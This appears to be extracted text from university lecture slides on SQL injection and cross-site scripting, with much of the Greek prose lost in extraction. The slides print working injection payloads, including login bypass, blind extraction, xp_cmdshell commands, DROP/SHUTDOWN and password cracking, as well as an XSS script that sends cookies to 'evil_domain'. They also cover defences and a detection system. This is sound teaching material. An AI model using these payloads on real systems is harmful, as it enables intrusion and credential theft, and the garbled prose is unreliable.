(sql injection) 7 2016 - icsd.aegean.gr · statement stat = connection.createstatement(); resultset...

1

7 2016

7 2016

https://www.icsd.aegean.gr/t.tzouramanis/courses/[email protected]

https://www.icsd.aegean.gr/t.tzouramanis/courses/[email protected]

2

SQL(SQL Injection)

SQL(SQL Injection)

4https://www.linkedin.com/pulse/why-does-sql-injection-still-work-2015-greg-macphersonhttps://www.linkedin.com/pulse/why-does-sql-injection-still-work-2015-greg-macpherson 5https://www.veracode.com/blog/2016/04/why-sql-injection-still-aroundhttps://www.veracode.com/blog/2016/04/why-sql-injection-still-around

6J. Clarke : SQL Injection Attacks and Defense, 2nd Edition, Syngress, 2012J. Clarke : SQL Injection Attacks and Defense, 2nd Edition, Syngress, 2012 7P. Russell: Ethical hacking: Basic Hacking With SQL Injection, WhitePlanet, 2015P. Russell: Ethical hacking: Basic Hacking With SQL Injection, WhitePlanet, 2015

Theodoros Tzouramanis, Department of Information and Communication Systems Engineering, University of the Aegean, M.Sc. Database Security, 2016 - 2017

2

8

Firewall Firewall Firewall

.

‘ ’ firewalls

firewalls - -

, . server databases.

Firewall

.

‘ ’

firewalls firewalls -

- , . server databases.

9

Firewall( )

Firewall( )

server, ( ,

ports) firewall.firewall

, . :web server 80,e-mail SMTP server 25,SQL server 1433,MySQL server 3306,Oracle Net Listener 1521, .

firewalls software ( .Gauntlet, Firewall-1, Raptor) hardware ( .Cisco Firewall).

server, ( ,

ports) firewall.firewall

, . :web server 80,e-mail SMTP server 25,SQL server 1433,MySQL server 3306,Oracle Net Listener 1521, .

firewalls software ( .Gauntlet, Firewall-1, Raptor) hardware ( .Cisco Firewall).

10

Firewall Firewallhackers ‘

’, .

hackers firewall, .e-mail attachments,

- ‘ ’ ,cookies,

http ( . :

http://mywebsite/myapp.cgi?acctnum=3), .

.

hackers ‘’, .

hackers firewall, .e-mail attachments,

- ‘ ’ ,cookies,

http ( . :

http://mywebsite/myapp.cgi?acctnum=3), .

.11

Firewalls Firewalls

firewall .

( : secureweb ).

web: SQL.

firewall .

( : secureweb ).

web: SQL.

12

SQL SQL: hacker

webSQL .

: Rain Forest Puppy, 1998.

Jeremiah GrossmanRain forest puppy (rfp) is one of the REAL pioneers of the industry whocontributed a ton of cutting-edge research that we still use today. You'llalso notice that he's a very humble guy who prefers to continue givingback rather than taking the credit he deserves. Welcome back rfp.

: hackerweb

SQL .: Rain Forest Puppy, 1998.

Jeremiah GrossmanRain forest puppy (rfp) is one of the REAL pioneers of the industry whocontributed a ton of cutting-edge research that we still use today. You'llalso notice that he's a very humble guy who prefers to continue givingback rather than taking the credit he deserves. Welcome back rfp. 13

SQL( )

SQL( )

ASPlogin web:

<% dim username, password;txt_username = Request.form("text_username");txt_password = Request.form("text_password");var con = Server.CreateObject(ADODB.Connection"); var rso = Server.CreateObject(ADODB.Recordset"); var str_query = "select * from USERS where username = ' " +

txt_username + " ' and password = ' " + txt_password + " ';";rso.open(str_query, con);if (rso.eof) then

response.write "Invalid login."else

response.write "Welcome to the database!"; %>

ASPlogin web:

<% dim username, password;txt_username = Request.form("text_username");txt_password = Request.form("text_password");var con = Server.CreateObject(ADODB.Connection"); var rso = Server.CreateObject(ADODB.Recordset"); var str_query = "select * from USERS where username = ' " +

txt_username + " ' and password = ' " + txt_password + " ';";rso.open(str_query, con);if (rso.eof) then

response.write "Invalid login."else

response.write "Welcome to the database!"; %>


3

14

String sLogin = getParameter("Login");String sPassword = getParameter("Password");String query = "SELECT member_id, member_level FROM membersWHERE member_login=' "+ sLogin + " ' AND member_password=' " + sPassword + " ' ";Statement stat = connection.createStatement();ResultSet rs = stat.executeQuery(query);

15

SQL( )

SQL( )

var sql = "select * from users where username ='" + username +"' and password = '" + password + "'";

:username: ttzourampassword: 45dc&vg3

string sql :select * from users where username = 'ttzouram' and password = '45dc&vg3';

:Welcome to the database!


:username: ttzourampassword: 45dc&vg3

string sql :select * from users where username = 'ttzouram' and password = '45dc&vg3';

:Welcome to the database!

16

SQL( - )

SQL( - )


:username: ttzou'rampassword: 45dc&vg3

string sql :select * from users where username = 'ttzou'ram' and password = '45dc&vg3';

:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’[Microsoft][ODBC SQL Server Driver][SQL Server][Line 1: Incorrect syntax near ‘ram‘/process_login.asp, line 14


:username: ttzou'rampassword: 45dc&vg3

string sql :select * from users where username = 'ttzou'ram' and password = '45dc&vg3';

:Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14’[Microsoft][ODBC SQL Server Driver][SQL Server][Line 1: Incorrect syntax near ‘ram‘/process_login.asp, line 14

17

SQL( - )

SQL( - )


hacker :username: ' or 1=1--password: anything

string sql :select * from users where username = '' or 1=1--' and password = 'anything';

: users.

hacker,

admin.


hacker :username: ' or 1=1--password: anything

string sql :select * from users where username = '' or 1=1--' and password = 'anything';

: users.

hacker,

admin.

18

SQL( - )

SQL( - )


hacker username:username: ' or username='ttzouram'--password: anything

string sql :select * from users where username = '' or username='ttzouram'--' and

password = 'anything';hacker

ttzouram,password .


hacker username:username: ' or username='ttzouram'--password: anything

string sql :select * from users where username = '' or username='ttzouram'--' and

password = 'anything';hacker

ttzouram,password .

19

SQL


4

20

SQL( - )

SQL( - )


hacker :username: ' and 1 in (select @@version)--password: anything

error:Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server][Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1998-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int./process_login.asp, line 14

SQL ServerWindows! hacker googlesearch server.


hacker :username: ' and 1 in (select @@version)--password: anything

error:Microsoft OLE DB Provider for ODBC Drivers error ' 80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server][Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright © 1998-2000 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 3) ' to a column of data type int./process_login.asp, line 14

SQL ServerWindows! hacker googlesearch server. 21

SQL( - )

SQL( - )

22

username: ' UNION SELECT @@version, NULL --password: anything

:Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Personal Edition on Windows NT 5.0 (Build 2195: Service Pack 4)' to a column of data typeint

23

SQL( - )

SQL( - )


hacker :username: ' ;SHUTDOWN--password:

SQL Server.

' ;DROP Database < >--, ' ;DROP Table < >--, ' ;DELETE FROM < >--, .


hacker :username: ' ;SHUTDOWN--password:

SQL Server.

' ;DROP Database < >--, ' ;DROP Table < >--, ' ;DELETE FROM < >--, .

SQL Server

24

SQL( - )

SQL( - )

ZU 0666', 0, 0); DROP DATABASE TABLICE;--

;

ZU 0666', 0, 0); DROP DATABASE TABLICE;--

;

25


5

26

username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108) --

ASCII

108

ASCII

108

;

27

username: ' AND ascii(lower(substring( (SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108 WAITFOR DELAY '0:0:5') --

ASCII

108

ASCII

108

;

28

SQL( )

SQL( )


1.hacker :username: '; create table foo(a int identity(1,1), b varchar(4000));insert into foo exec master..xp_cmdshell 'dir'--password:

2.1, hacker :

username: ' or 1 in (select b from foo where a=1)--password:

: a = 1 a = 2, a= 3, .


1.hacker :username: '; create table foo(a int identity(1,1), b varchar(4000));insert into foo exec master..xp_cmdshell 'dir'--password:

2.1, hacker :

username: ' or 1 in (select b from foo where a=1)--password:

: a = 1 a = 2, a= 3, .

31

SQL( – )

SQL( – )


3.hacker :

username: '; create table foo2(a int identity(1,1), b varchar(4000)); insertinto foo2 exec master..xp_cmdshell 'cmd /c net user'--password:

4.5, hacker :

username: ' or 1 in (select b from foo2 where a=1)--password:

: a = 1 a = 2, a = 3, .


3.hacker :

username: '; create table foo2(a int identity(1,1), b varchar(4000)); insertinto foo2 exec master..xp_cmdshell 'cmd /c net user'--password:

4.5, hacker :

username: ' or 1 in (select b from foo2 where a=1)--password:

: a = 1 a = 2, a = 3, .

32

SQL( – )

SQL( – )


5. hacker:

username: ttz'; exec master..xp_cmdshell 'nslookup dblab1.samos.aegean.gr >c:\fooo.txt'--password:

:foo.

6. hacker:

username: ttzourampassword: 12345' or 1=1 or '' = '

: Oracle.


5. hacker:

username: ttz'; exec master..xp_cmdshell 'nslookup dblab1.samos.aegean.gr >c:\fooo.txt'--password:

:foo.

6. hacker:

username: ttzourampassword: 12345' or 1=1 or '' = '

: Oracle.

33

SQL Windows Server SQL Windows Server

M SQLsp_OACreate,

sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProper-ty, sp_OAMethod hacker

Active Directory IISWindows Server!

M SQLxp_instance_regadd-

multistring, xp_instance_regwrite, xp_instance_reg-read, xp_regdeletekey, xp_regdeletevalue,xp_regremove, hacker

registry Windows Server!

M SQLsp_OACreate,

sp_OADestroy, sp_OAGetErrorInfo, sp_OAGetProper-ty, sp_OAMethod hacker

Active Directory IISWindows Server!

M SQLxp_instance_regadd-

multistring, xp_instance_regwrite, xp_instance_reg-read, xp_regdeletekey, xp_regdeletevalue,xp_regremove, hacker

registry Windows Server!


6

34

SQL Server SQL

SQL Server SQL

--.

SQL

; .error outputs

SQL Server .

--.

SQL

; .error outputs

SQL Server .

35

SQL SQL

:

:1.

web .2.

(log file).

:

:1.

web .2.

(log file).

36

SQL( )

SQL( )

:1.

:a.

(- ;),

:1.

:a.

(- ;),

function validate_string( input )

known_bad = array( "select", "insert", "update", "delete", "drop", “shutdown", "--", "'" );

validate_string = true;for i = lbound( known_bad ) to ubound( known_bad )if ( InStr( 1, input, known_bad(i), vbtextcompare ) <> 0 ) then

validate_string = false; exit function;end if;

next;end function 37

SQL( )

SQL( )

:1.

:b.

(- ;),

:1.

:b.

(- ;),

function validate_password( input )

good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~@#$%^*(){}[]<>,.?"

validate_password = true;for i = 1 to len( input )

c = mid( input, i, 1 )if ( InStr( good_password_chars, c ) = 0 ) then

validate_password = false; exit function;end if;

next;end function

38

SQL( )

SQL( )

:1.

:c.

,‘

‘:

:1.

:c.

,‘

‘:

function escape( input )input = replace(input, " ' ", " ' ' ");escape = input;

end function

39

SQL( )

SQL( )

:1.

:d. , .

username varchar(12)varchar(256),

string, .

'; SHUTDOWN;--varchar(<14)

:1.

:d. , .

username varchar(12)varchar(256),

string, .

'; SHUTDOWN;--varchar(<14)


7

40

SQL( )

SQL( )

( ):2.

xp_cmdshell, xp_regread, xp_resultset,( Oracle: utl_file, dbms_lob, dbms_pipe,dbms_output, utl_http,utl_smtp).

( ):2.

xp_cmdshell, xp_regread, xp_resultset,( Oracle: utl_file, dbms_lob, dbms_pipe,dbms_output, utl_http,utl_smtp).

41

SQL( )

SQL( )

( ):3.

.

( )( ) .

( ):3.

.

( )( ) .

42

SQL( )

SQL( )

( ):4.

,(

server).

.

( ):4.

,(

server).

.

HashUsername = md5(username);HashPassword = md5(password);connect('testserver.com','root','')select_db('testdb'); sql_query = "SELECT username FROM users WHERE username = HashUsername and password = HashPassword";//execute the query$result = query($sql_query) 43

SQL( )

SQL( )

44

SQL( )

SQL( )

( ):5.

(, .

http://goo.gl/JPtms),bug

.

( ):5.

(, .

http://goo.gl/JPtms),bug

.

45

SQL

SQL

web

password .

, hacker :username: admin'--password: anything

SQL insert :

insert into users values( 123, 'admin''--', 'anything' )

web

password .

, hacker :username: admin'--password: anything

SQL insert :

insert into users values( 123, 'admin''--', 'anything' )


8

46

SQL ( )

SQL ( )

password .:

username = escape( Request.form("username") );oldpassword = escape( Request.form("oldpassword") );newpassword = escape( Request.form("newpassword") );var rso = Server.CreateObject("ADODB.Recordset");var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";rso.open( sql, cn );if (rso.EOF){…

password .:

username = escape( Request.form("username") );oldpassword = escape( Request.form("oldpassword") );newpassword = escape( Request.form("newpassword") );var rso = Server.CreateObject("ADODB.Recordset");var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";rso.open( sql, cn );if (rso.EOF){…

47

SQL ( )

SQL ( )

SQL password:

sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"

rso("username") usernamelogin.

hacker admin'--,SQL :

update users set password = 'password' where username = 'admin'--'

hacker password admin!

. ’ O’Hara -

username .

SQL password:

sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"

rso("username") usernamelogin.

hacker admin'--,SQL :

update users set password = 'password' where username = 'admin'--'

hacker password admin!

. ’ O’Hara -

username .

48

SQL (log file)

SQL (log file)

hackersp_password ( , username: 'admin'--

sp_password) log file:

-- 'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.

hackersp_password ( , username: 'admin'--

sp_password) log file:

-- 'sp_password' was found in the text of this event.-- The text has been replaced with this comment for security reasons.

49

Script Passwords Passwords Username

Script Passwords Passwords Username

script .

SQL server.script

dict(word varchar(256)) master. passwords

.

script .

SQL server.script

dict(word varchar(256)) master. passwords

.select name, word as password from dict inner join sysxloginson (pwdcompare( word, sysxlogins.password, 0 ) = 1)union select name, password from sysxlogins where(pwdcompare( name, password, 0 ) = 1)union select name, null from sysxloginswhere password is null;

50

... ...

web portal ?

SQL injection examination

server

original database

server

51

...( )

Prepared statements


9

52

*

SQL

SQL

.

* K. Kemalis and T. Tzouramanis: “SQL-IDS: A Specification-based Approach for SQL-Injection Detection”,In Proceedings of the 23rd ACM Symposium on Applied Computing (ACM SAC 2008) - ComputerSecurity Track, Fortaleza, Ceara, Brazil, March 2008.

* K. Kemalis and T. Tzouramanis: “SQL-IDS: A Specification-based Approach for SQL-Injection Detection”,In Proceedings of the 23rd ACM Symposium on Applied Computing (ACM SAC 2008) - ComputerSecurity Track, Fortaleza, Ceara, Brazil, March 2008. 53

54

SQL-IDS(SQL-Injection Detection System -

SQL )

Java.

55

SQL-IDS

56

57

SQL .

EBNF (Extended Backus–Naur Form).

.: http://savage.net.au/SQL/sql-2003-2.bnf.html


10

58

…

SQL :

SELECT member_idFROM membersWHERE (member_login = 'guest' OR member_email =

'[email protected]') AND member_password = 'guest‘;

59

…

<Query specification> :=SELECT <SELECT List> <FROM Clause> <WHERE Clause>

<SELECT List> := <Table Column> (<COMMA> <Table Column> )

<Table Column> := <IDENTIFIER>

<FROM Clause> := FROM <Table reference>

<Table reference> := <IDENTIFIER>

<WHERE Clause> :=WHERE <search condition> AND <search condition>

<search condition> := <Table Column> "=" <STRING_LITERAL>

60

• :0 - 20 milliseconds

• :0,5 milliseconds

61

62 63


11

66

: Security AppScan Source Edition

Fortify Source Code AnalyzerCodeSecureKlocwork Solo

.

:GrauditYet Another Source Code Analyzer (YASCA)PixyAppCodeScanOWASP LAPSE+ ProjectMicrosoft Source Code Analyzer for SQL InjectionMicrosoft Code Analysis Tool .NET (CAT.NET)RIPS—A Static Source Code Analyzer for Vulnerabilities in PHPScriptsCodePro AnalytiXTeachable Static Analysis Workbench

67

SQL

BSQL ( ):

68

(Cross Site Scripting Attacks)

(Cross Site Scripting Attacks)

69

XSS

• :

• :

.• : ,

.• : , ,

.• : ,

.

70

Owasp (Open Web Application Security Project) (2007)

71

XSS

3 :

• (Dom Based):Document Object Model

.

• ( ):

server.

• ( ):( . . )

.


12

72

• : javascript,

, .server.

• :

.server

.

• : forum.

. server

.. 73

74

( )

• 1: ,

:

75

• 2: server

( )

# server

76

( )

3:,

.

77

2. URL

6.

5. server, o URL

-

, .


13

78

79

( )

• 1:

. .link e-mail.

:

$_GET $_REQUEST

80

( )

• 2: O server .

81

• 3.server

server,

.

( )

82

2. URL

6.

5.

security context .

83


14

84

( )

• 1:

.

<

85

• 2: :

( )

86

• 3: O server,

.

( )

87

6.

5.

.

88

XSS ;

89

XSS *

* : " ", , , . , 2008.

* : " ", , , . , 2008.


15

90

forum. :

, (posts),

, ,

.

91

Apache Web Servermysql-essentialphpphpMyAdminJavascript

92

93

94

95


16

96

97

98

pop up

99

<script>document.location ='http://evil_domain/steal.php?cookies=' + document.cookie</script>

GET

100

101

site


17

102

103

104

<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>

105

Click!

106

Script inside steal.php:

107

”refresh”

!


18

108

<script>document.location='http://evil_domain/steal.php?cookies=' + document.cookie</script>

109

[1]

•

: DOM,

javascript, ,

, .

Noxies [2]

•

HTTP.

•

.• HTTP Referrer

.

110

* .

HTTP Referrer , .

:[1] Vogt P., Nentwich F., Jovanovic N., Kirda E., Kruegel C., Vigna G. :Cross-Site Scripting Prevention with Dynamic Data Tainting and StaticAnalysis, Proc Network and Distributed System Security Symposium,San Diego, 2007

[2] Kirda E., Kruegel C., Vigna G., Jovanovic N.: Noxes: A Client-SideSolution for Mitigating Cross-Site Scripting Attacks, Proc. 21st AnnualACM Symposium on Applied Computing, France, 2006

111

112

XSS

• : server,

(security patches),.

• :

,

.• :

.• : javascript ,

, cookies ,«

».

SQL XSS- -

SQL XSS- -


(sql injection) 7 2016 - icsd.aegean.gr · statement stat = connection.createstatement(); resultset...

Documents